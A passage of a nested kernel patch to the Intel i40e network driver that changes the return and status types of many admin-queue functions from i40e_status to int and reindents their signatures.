+-		return "I40E_ERR_ADMIN_QUEUE_CRITICAL_ERROR";
+-	}
+-
+-	snprintf(hw->err_str, sizeof(hw->err_str), "%d", stat_err);
+-	return hw->err_str;
+-}
+-
+ /**
+  * i40e_debug_aq
+  * @hw: debug mask related to admin queue
+@@ -355,13 +207,13 @@ bool i40e_check_asq_alive(struct i40e_hw *hw)
+  * Tell the Firmware that we're shutting down the AdminQ and whether
+  * or not the driver is unloading as well.
+  **/
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+-					     bool unloading)
++int i40e_aq_queue_shutdown(struct i40e_hw *hw,
++			   bool unloading)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_queue_shutdown *cmd =
+ 		(struct i40e_aqc_queue_shutdown *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_queue_shutdown);
+@@ -384,15 +236,15 @@ i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw,
+  *
+  * Internal function to get or set RSS look up table
+  **/
+-static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+-					   u16 vsi_id, bool pf_lut,
+-					   u8 *lut, u16 lut_size,
+-					   bool set)
++static int i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
++				   u16 vsi_id, bool pf_lut,
++				   u8 *lut, u16 lut_size,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_lut *cmd_resp =
+ 		   (struct i40e_aqc_get_set_rss_lut *)&desc.params.raw;
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -437,8 +289,8 @@ static i40e_status i40e_aq_get_set_rss_lut(struct i40e_hw *hw,
+  *
+  * get the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size,
+ 				       false);
+@@ -454,8 +306,8 @@ i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * set the RSS lookup table, PF or VSI type
+  **/
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+-				bool pf_lut, u8 *lut, u16 lut_size)
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
++			bool pf_lut, u8 *lut, u16 lut_size)
+ {
+ 	return i40e_aq_get_set_rss_lut(hw, vsi_id, pf_lut, lut, lut_size, true);
+ }
+@@ -469,16 +321,16 @@ i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 vsi_id,
+  *
+  * get the RSS key per VSI
+  **/
+-static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+-				      u16 vsi_id,
+-				      struct i40e_aqc_get_set_rss_key_data *key,
+-				      bool set)
++static int i40e_aq_get_set_rss_key(struct i40e_hw *hw,
++				   u16 vsi_id,
++				   struct i40e_aqc_get_set_rss_key_data *key,
++				   bool set)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_set_rss_key *cmd_resp =
+ 			(struct i40e_aqc_get_set_rss_key *)&desc.params.raw;
+ 	u16 key_size = sizeof(struct i40e_aqc_get_set_rss_key_data);
++	int status;
+ 
+ 	if (set)
+ 		i40e_fill_default_direct_cmd_desc(&desc,
+@@ -509,9 +361,9 @@ static i40e_status i40e_aq_get_set_rss_key(struct i40e_hw *hw,
+  * @key: pointer to key info struct
+  *
+  **/
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, false);
+ }
+@@ -524,9 +376,9 @@ i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+  *
+  * set the RSS key per VSI
+  **/
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 vsi_id,
+-				struct i40e_aqc_get_set_rss_key_data *key)
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 vsi_id,
++			struct i40e_aqc_get_set_rss_key_data *key)
+ {
+ 	return i40e_aq_get_set_rss_key(hw, vsi_id, key, true);
+ }
+@@ -796,10 +648,10 @@ struct i40e_rx_ptype_decoded i40e_ptype_lookup[BIT(8)] = {
+  * hw_addr, back, device_id, vendor_id, subsystem_device_id,
+  * subsystem_vendor_id, and revision_id
+  **/
+-i40e_status i40e_init_shared_code(struct i40e_hw *hw)
++int i40e_init_shared_code(struct i40e_hw *hw)
+ {
+-	i40e_status status = 0;
+ 	u32 port, ari, func_rid;
++	int status = 0;
+ 
+ 	i40e_set_mac_type(hw);
+ 
+@@ -836,15 +688,16 @@ i40e_status i40e_init_shared_code(struct i40e_hw *hw)
+  * @addrs: the requestor's mac addr store
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+-				   u16 *flags,
+-				   struct i40e_aqc_mac_address_read_data *addrs,
+-				   struct i40e_asq_cmd_details *cmd_details)
++static int
++i40e_aq_mac_address_read(struct i40e_hw *hw,
++			 u16 *flags,
++			 struct i40e_aqc_mac_address_read_data *addrs,
++			 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_read *cmd_data =
+ 		(struct i40e_aqc_mac_address_read *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_mac_address_read);
+ 	desc.flags |= cpu_to_le16(I40E_AQ_FLAG_BUF);
+@@ -863,14 +716,14 @@ static i40e_status i40e_aq_mac_address_read(struct i40e_hw *hw,
+  * @mac_addr: address to write
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+-				    u16 flags, u8 *mac_addr,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_mac_address_write(struct i40e_hw *hw,
++			      u16 flags, u8 *mac_addr,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_mac_address_write *cmd_data =
+ 		(struct i40e_aqc_mac_address_write *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_mac_address_write);
+@@ -893,11 +746,11 @@ i40e_status i40e_aq_mac_address_write(struct i40e_hw *hw,
+  *
+  * Reads the adapter's MAC address from register
+  **/
+-i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 
+@@ -914,11 +767,11 @@ i40e_status i40e_get_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+  *
+  * Reads the adapter's Port MAC address
+  **/
+-i40e_status i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
++int i40e_get_port_mac_addr(struct i40e_hw *hw, u8 *mac_addr)
+ {
+ 	struct i40e_aqc_mac_address_read_data addrs;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	status = i40e_aq_mac_address_read(hw, &flags, &addrs, NULL);
+ 	if (status)
+@@ -972,13 +825,13 @@ void i40e_pre_tx_queue_cfg(struct i40e_hw *hw, u32 queue, bool enable)
+  *
+  *  Reads the part number string from the EEPROM.
+  **/
+-i40e_status i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
+-				 u32 pba_num_size)
++int i40e_read_pba_string(struct i40e_hw *hw, u8 *pba_num,
++			 u32 pba_num_size)
+ {
+-	i40e_status status = 0;
+ 	u16 pba_word = 0;
+ 	u16 pba_size = 0;
+ 	u16 pba_ptr = 0;
++	int status = 0;
+ 	u16 i = 0;
+ 
+ 	status = i40e_read_nvm_word(hw, I40E_SR_PBA_FLAGS, &pba_word);
+@@ -1087,8 +940,8 @@ static enum i40e_media_type i40e_get_media_type(struct i40e_hw *hw)
+  * @hw: pointer to the hardware structure
+  * @retry_limit: how many times to retry before failure
+  **/
+-static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+-				   u32 retry_limit)
++static int i40e_poll_globr(struct i40e_hw *hw,
++			   u32 retry_limit)
+ {
+ 	u32 cnt, reg = 0;
+ 
+@@ -1114,7 +967,7 @@ static i40e_status i40e_poll_globr(struct i40e_hw *hw,
+  * Assuming someone else has triggered a global reset,
+  * assure the global reset is complete and then reset the PF
+  **/
+-i40e_status i40e_pf_reset(struct i40e_hw *hw)
++int i40e_pf_reset(struct i40e_hw *hw)
+ {
+ 	u32 cnt = 0;
+ 	u32 cnt1 = 0;
+@@ -1453,15 +1306,16 @@ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink)
+  *
+  * Returns the various PHY abilities supported on the Port.
+  **/
+-i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details)
++int
++i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++			     bool qualified_modules, bool report_init,
++			     struct i40e_aq_get_phy_abilities_resp *abilities,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+-	struct i40e_aq_desc desc;
+-	i40e_status status;
+ 	u16 abilities_size = sizeof(struct i40e_aq_get_phy_abilities_resp);
+ 	u16 max_delay = I40E_MAX_PHY_TIMEOUT, total_delay = 0;
++	struct i40e_aq_desc desc;
++	int status;
+ 
+ 	if (!abilities)
+ 		return I40E_ERR_PARAM;
+@@ -1532,14 +1386,14 @@ i40e_status i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+  * of the PHY Config parameters. This status will be indicated by the
+  * command response.
+  **/
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aq_set_phy_config *cmd =
+ 			(struct i40e_aq_set_phy_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	if (!config)
+ 		return I40E_ERR_PARAM;
+@@ -1554,7 +1408,7 @@ enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+ 	return status;
+ }
+ 
+-static noinline_for_stack enum i40e_status_code
++static noinline_for_stack int
+ i40e_set_fc_status(struct i40e_hw *hw,
+ 		   struct i40e_aq_get_phy_abilities_resp *abilities,
+ 		   bool atomic_restart)
+@@ -1612,11 +1466,11 @@ i40e_set_fc_status(struct i40e_hw *hw,
+  *
+  * Set the requested flow control mode using set_phy_config.
+  **/
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_restart)
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_restart)
+ {
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	*aq_failures = 0x0;
+ 
+@@ -1655,13 +1509,13 @@ enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+  *
+  * Tell the firmware that the driver is taking over from PXE
+  **/
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+-	i40e_status status;
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_clear_pxe *cmd =
+ 		(struct i40e_aqc_clear_pxe *)&desc.params.raw;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_clear_pxe_mode);
+@@ -1683,14 +1537,14 @@ i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+  *
+  * Sets up the link and restarts the Auto-Negotiation over the link.
+  **/
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_link_restart_an *cmd =
+ 		(struct i40e_aqc_set_link_restart_an *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_link_restart_an);
+@@ -1715,17 +1569,17 @@ i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+  *
+  * Returns the link status of the adapter.
+  **/
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_link_status *resp =
+ 		(struct i40e_aqc_get_link_status *)&desc.params.raw;
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+-	i40e_status status;
+ 	bool tx_pause, rx_pause;
+ 	u16 command_flags;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc, i40e_aqc_opc_get_link_status);
+ 
+@@ -1811,14 +1665,14 @@ aq_get_link_info_exit:
+  *
+  * Set link interrupt mask.
+  **/
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+-				     u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
++			     u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_int_mask *cmd =
+ 		(struct i40e_aqc_set_phy_int_mask *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_int_mask);
+@@ -1838,13 +1692,13 @@ i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw,
+  *
+  * Reset the external PHY.
+  **/
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				  struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_phy_debug *cmd =
+ 		(struct i40e_aqc_set_phy_debug *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_phy_debug);
+@@ -1879,9 +1733,9 @@ static bool i40e_is_aq_api_ver_ge(struct i40e_adminq_info *aq, u16 maj,
+  *
+  * Add a VSI context to the hardware.
+ **/
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -1889,7 +1743,7 @@ i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_vsi);
+@@ -1923,15 +1777,15 @@ aq_add_vsi_exit:
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+-				    u16 seid,
+-				    struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_default_vsi(struct i40e_hw *hw,
++			    u16 seid,
++			    struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1951,15 +1805,15 @@ i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw,
+  * @seid: vsi number
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+-				      u16 seid,
+-				      struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw,
++			      u16 seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -1981,16 +1835,16 @@ i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw,
+  * @cmd_details: pointer to command details structure or NULL
+  * @rx_only_promisc: flag to decide if egress traffic gets mirrored in promisc
+  **/
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set,
+-				struct i40e_asq_cmd_details *cmd_details,
+-				bool rx_only_promisc)
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
++					u16 seid, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2021,14 +1875,15 @@ i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+  * @set: set multicast promiscuous enable/disable
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-				u16 seid, bool set, struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
++					  u16 seid, bool set,
++					  struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2054,16 +1909,16 @@ i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any multicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2090,16 +1945,16 @@ enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any unicast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2132,15 +1987,15 @@ enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+  * @vid: The VLAN tag filter - capture any broadcast packet with this VLAN tag
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2167,14 +2022,14 @@ i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+  *
+  * Set or clear the broadcast promiscuous flag (filter) for a given VSI.
+  **/
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 seid, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 seid, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2200,15 +2055,15 @@ i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+  * @enable: set MAC L2 layer unicast promiscuous enable/disable for a given VLAN
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				       u16 seid, bool enable,
+-				       struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_vsi_promiscuous_modes *cmd =
+ 		(struct i40e_aqc_set_vsi_promiscuous_modes *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 flags = 0;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					i40e_aqc_opc_set_vsi_promiscuous_modes);
+@@ -2230,9 +2085,9 @@ i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+  * @vsi_ctx: pointer to a vsi context struct
+  * @cmd_details: pointer to command details structure or NULL
+  **/
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2240,7 +2095,7 @@ i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_vsi_parameters);
+@@ -2272,9 +2127,9 @@ aq_get_vsi_params_exit:
+  *
+  * Update a VSI context.
+  **/
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_get_update_vsi *cmd =
+@@ -2282,7 +2137,7 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+ 	struct i40e_aqc_add_get_update_vsi_completion *resp =
+ 		(struct i40e_aqc_add_get_update_vsi_completion *)
+ 		&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_update_vsi_parameters);
+@@ -2310,15 +2165,15 @@ i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+  *
+  * Fill the buf with switch configuration returned from AdminQ command
+  **/
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_switch_seid *scfg =
+ 		(struct i40e_aqc_switch_seid *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_get_switch_config);
+@@ -2344,15 +2199,15 @@ i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+  *
+  * Set switch configuration bits
+  **/
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_set_switch_config *scfg =
+ 		(struct i40e_aqc_set_switch_config *)&desc.params.raw;
+-	enum i40e_status_code status;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_set_switch_config);
+@@ -2381,16 +2236,16 @@ enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+  *
+  * Get the firmware version from the admin queue commands
+  **/
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details)
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details)
+ {
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_get_version *resp =
+ 		(struct i40e_aqc_get_version *)&desc.params.raw;
+-	i40e_status status;
++	int status;
+ 
